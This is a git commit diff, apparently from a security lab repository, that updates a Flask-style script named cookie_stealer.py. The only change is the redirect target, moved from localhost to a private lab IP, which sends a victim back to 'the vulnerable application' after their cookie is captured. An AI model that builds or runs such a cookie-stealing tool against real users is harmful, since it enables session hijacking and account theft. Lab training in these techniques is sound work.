Update cookie_stealer.py

This commit is contained in:
Omar Santos 2022-02-07 11:00:07 -05:00 committed by GitHub
parent 5b2a454937
commit aedcb0839f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -24,7 +24,7 @@ def cookie():
# redirecting the user back to the vulnerable application
# change the URL to whatever application you are leveraging
return redirect("http://127.0.0.1:9003")
return redirect("http://10.6.6.22")
# you can change the port below to whatever you want to listen it
if __name__ == "__main__":